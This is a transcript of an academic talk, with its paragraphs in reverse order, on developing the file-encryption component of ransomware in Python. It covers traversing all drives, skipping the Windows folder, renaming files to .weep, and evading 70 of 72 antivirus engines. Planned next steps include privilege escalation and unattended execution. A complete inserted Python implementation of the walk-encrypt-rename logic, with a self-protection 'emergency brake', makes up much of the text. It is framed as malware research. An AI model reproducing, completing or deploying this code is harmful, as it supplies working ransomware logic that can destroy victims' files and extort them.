In the near future, the researchers aim to do three more things. First, leverage DLLs to increase memory efficiency, which can make the encryption program faster and stealthier. Second, try other symmetric-key encryption algorithms and compare their efficiency to select the best algorithm for encryption and decryption. Last, develop the other parts of the ransomware, such as the privilege-escalation part, and make it run automatically without the need for user interaction.
Conclusions.
This encryption program was not detected by most anti-virus engines, but it is slow. Encrypting all files on the computer at administrator and user privilege does not damage crucial Windows files, but for ransomware it should encrypt only important file extensions, or encrypt based on the user's directory, for more speed.
This is the plotted result of the encryption speed and decryption speed for different file sizes under 1 GB, starting from 102.4 MB and scaling up linearly to 1024 MB. You will see that encryption speed is slower and degrades faster than decryption speed.
However, the researchers also generated a 1.00 GB all-zeros file and compared the speed of encryption and decryption. This is how the researchers generated the 1 GB all-zeros file. And this is the result.
Next, about the speed. The speed of the encryption program is 2.873 MB/s and that of the decryption program is 24.57 MB/s, but the total file size processed by the decryption program is bigger, because the original file is expanded during encryption by around 33%, since the program uses base64 encoding as part of the encryption.
These two screenshots from the target computer show that, while the encryption program is running, it uses very high resources on the target computer, rendering the target computer slow. In other words, if this were real ransomware, the victim would know that there's something wrong with their computer(s).
The encryption and decryption programs are detected as malicious by only 2 out of 72 antivirus engines. The engines that detect both programs as malicious are SecureAge APEX and Cynet.
After converting the Python files to .exe files, the researchers uploaded the .exe files of the encryption and decryption programs to VirusTotal. VirusTotal is an online platform for analyzing viruses. Any file uploaded to VirusTotal is scanned with more than 70 antivirus engines. The results for both the encryption and decryption programs are the same.
Next, we ran the encryption program on the target computer. This is the specification of the target computer. While the encryption and decryption programs were running, Windows Defender and Windows Firewall were active.
After finishing writing the code, the program was converted to an .exe file so it can run on any Windows OS without the prior need to install a Python interpreter on the machine.
The decryption process is simpler than the encryption process: it just checks whether a file has the .weep extension or not, and if a file has the .weep extension, the program decrypts that file. After the decryption process is done, the program removes the .weep extension from that file, making the file usable again.
Next, the researcher will explain the encryption and decryption programs with a flowchart.
The encryption program starts with the Emergency Brake function. It is run a single time to make sure the computer running the encryption program is not the researchers', by comparing the hash of the researchers' computer name with a predefined hash value, because the researchers don't want their own computers to be encrypted. Next, it finds the main drive with the echo %Systemroot% command. Next, it generates the drive list: the names of Windows drives can only be the letters a-z, so the program lists them and encrypts all drives except the main drive. Next, the program recursively encrypts all files in the file list generated by the os.walk command, but only encrypts files smaller than 1 GB in size, for more speed. After the encryption process is finished, the program appends .weep as the encrypted-file extension; this lets the decryption program know which files were encrypted and need to be decrypted. After encrypting all files on every drive except the main drive, the program then encrypts the main drive, but not the /Windows folder, and the processes in the green rectangle are repeated.
On the question of how to encrypt without damaging the Windows OS itself: the researchers chose to omit <main drive>/Windows because it is where the critical files for the Windows OS reside.
This slide will talk about the encryption and decryption program design. The researchers developed the encryption and decryption programs using Python 3.9. The three main parts of the design are: first, the cryptography library, version 3.3.1. In this library, the researchers use AES-128 as the algorithm for encryption and decryption because it is considered a fast and secure encryption algorithm. Second, the os.walk() command; the researchers use this command to list all file paths on the target computer in order to encrypt and decrypt them. Last, the Python library called PyInstaller. The researchers use PyInstaller to convert the Python file to an .exe file.
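The flowchart steps described above (emergency brake on the hashed computer name, os.walk traversal, the 1 GB size limit, skipping the Windows folder, appending .weep) and the library choices on this slide, pulled together as an added worked example. This is my code, not the speaker's program. It assumes the cryptography library is used through its Fernet recipe (AES-128-CBC with an HMAC, base64url-encoded output, which is also what produces the roughly 33% growth the results report) and that the computer name is hashed with SHA-256; the host name RESEARCHER-PC, the sample files and all function names are made up for illustration. The demo only ever touches a temporary directory it creates itself.

```python
"""Walk-and-encrypt logic modelled on the talk's flowchart (added example, not the
speaker's code). Assumed, not stated in the talk: cryptography's Fernet recipe
(AES-128-CBC + HMAC-SHA256, base64url token) and SHA-256 of the computer name."""
import hashlib
import os
import platform
import tempfile

from cryptography.fernet import Fernet

ENCRYPTED_EXT = ".weep"
SIZE_LIMIT = 1 << 30      # files of 1 GiB or more are skipped, as in the talk
# Hypothetical researcher host name, kept only as a hash; replace with your own.
RESEARCHER_HOSTS = {hashlib.sha256(b"RESEARCHER-PC").hexdigest()}


def emergency_brake(computer_name, blocked_sha256=RESEARCHER_HOSTS):
    """True when the host name hashes to a researcher machine: refuse to run."""
    return hashlib.sha256(computer_name.encode("utf-8")).hexdigest() in blocked_sha256


def target_files(root, skip_dirs=(), size_limit=SIZE_LIMIT):
    """Yield files under root, pruning skip_dirs (e.g. <maindrive>\\Windows)."""
    skip = {os.path.normcase(os.path.abspath(d)) for d in skip_dirs}
    for dirpath, dirnames, filenames in os.walk(root):
        dirnames[:] = [d for d in dirnames if os.path.normcase(
            os.path.abspath(os.path.join(dirpath, d))) not in skip]
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                if os.path.getsize(path) < size_limit:
                    yield path
            except OSError:
                continue      # vanished or unreadable: skip it, keep walking


def encrypt_tree(root, key, skip_dirs=(), size_limit=SIZE_LIMIT):
    """Encrypt every eligible file in place and append .weep to its name."""
    fernet, done = Fernet(key), []
    for path in list(target_files(root, skip_dirs, size_limit)):
        if path.endswith(ENCRYPTED_EXT):
            continue          # already processed on an earlier pass
        with open(path, "rb") as fh:
            token = fernet.encrypt(fh.read())   # base64 token, ~4/3 of the input
        with open(path, "wb") as fh:
            fh.write(token)
        os.replace(path, path + ENCRYPTED_EXT)
        done.append(path + ENCRYPTED_EXT)
    return done


def decrypt_tree(root, key):
    """Reverse of encrypt_tree: only .weep files are touched, then renamed back."""
    fernet, done = Fernet(key), []
    for dirpath, _, filenames in os.walk(root):
        for name in filenames:
            if not name.endswith(ENCRYPTED_EXT):
                continue
            path = os.path.join(dirpath, name)
            with open(path, "rb") as fh:
                plain = fernet.decrypt(fh.read())  # InvalidToken on wrong key/data
            with open(path, "wb") as fh:
                fh.write(plain)
            os.replace(path, path[:-len(ENCRYPTED_EXT)])
            done.append(path[:-len(ENCRYPTED_EXT)])
    return done


def run_demo(size_limit=4096):
    """Constructed sample tree in a temp dir: encrypt, check the guards, decrypt."""
    key = Fernet.generate_key()
    report = b"quarterly numbers\n" * 100                       # 1800 bytes, eligible
    sample = {"docs/report.txt": report,
              "Windows/system32/kernel.dll": b"MZ" + b"\0" * 500,  # excluded dir
              "photos/big.raw": b"\xff" * (size_limit + 1)}        # over the limit
    with tempfile.TemporaryDirectory() as root:
        for rel, data in sample.items():
            path = os.path.join(root, *rel.split("/"))
            os.makedirs(os.path.dirname(path), exist_ok=True)
            with open(path, "wb") as fh:
                fh.write(data)
        encrypted = encrypt_tree(root, key, [os.path.join(root, "Windows")], size_limit)
        growth = os.path.getsize(encrypted[0]) / len(report)      # about 1.38 here
        restored = decrypt_tree(root, key)
        with open(os.path.join(root, "docs", "report.txt"), "rb") as fh:
            intact = fh.read() == report
        return {"encrypted": sorted(os.path.relpath(p, root).replace(os.sep, "/")
                                    for p in encrypted),
                "dll_untouched": os.path.exists(os.path.join(root, "Windows", "system32", "kernel.dll")),
                "big_untouched": os.path.exists(os.path.join(root, "photos", "big.raw")),
                "growth": growth, "restored": len(restored), "intact": intact,
                "brake_on_lab": emergency_brake("RESEARCHER-PC"),
                "brake_on_victim": emergency_brake("VICTIM-PC")}


if __name__ == "__main__":
    if emergency_brake(platform.node()):
        raise SystemExit("emergency brake: researcher machine, refusing to run")
    print(run_demo())
```

The growth figure comes from the Fernet token layout: version, timestamp, IV, PKCS7-padded ciphertext and a 32-byte HMAC, all base64url-encoded, so a large file comes out at a little over 4/3 of its size, which matches the 33% expansion and the extra bytes the decryption run has to read back. Reading and re-writing whole files through base64 is also part of why encryption is slower than a raw AES throughput figure would suggest.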
Next is how the researchers planned the experiment. First, the researchers wrote the encryption and decryption programs. Second, they tested the encryption and decryption programs against antivirus using the VirusTotal service. Next, the researchers ran the encryption and decryption programs on the target computer. Last, the researchers observed their behavior and collected the experiment results.
First, let me talk about the research background. The researchers want to know how malware is created from the malware author's point of view; therefore, the researchers studied papers about malware analysis and decided to attempt to develop malware, starting with the malware's encryption and decryption part.
I have divided this presentation into seven parts as follows. First is the research background. Second is the experiment method. Third is the encryption and decryption program. Fourth is the target computer. Fifth is the experimental result. Sixth is the conclusion. And finally, future work.
Hi everybody, my name is Chawalit Benjangkaprasert from King Mongkut's Institute of Technology Ladkrabang, Thailand. My presentation topic for today is Malware Developing Guide: Encryption and Decryption.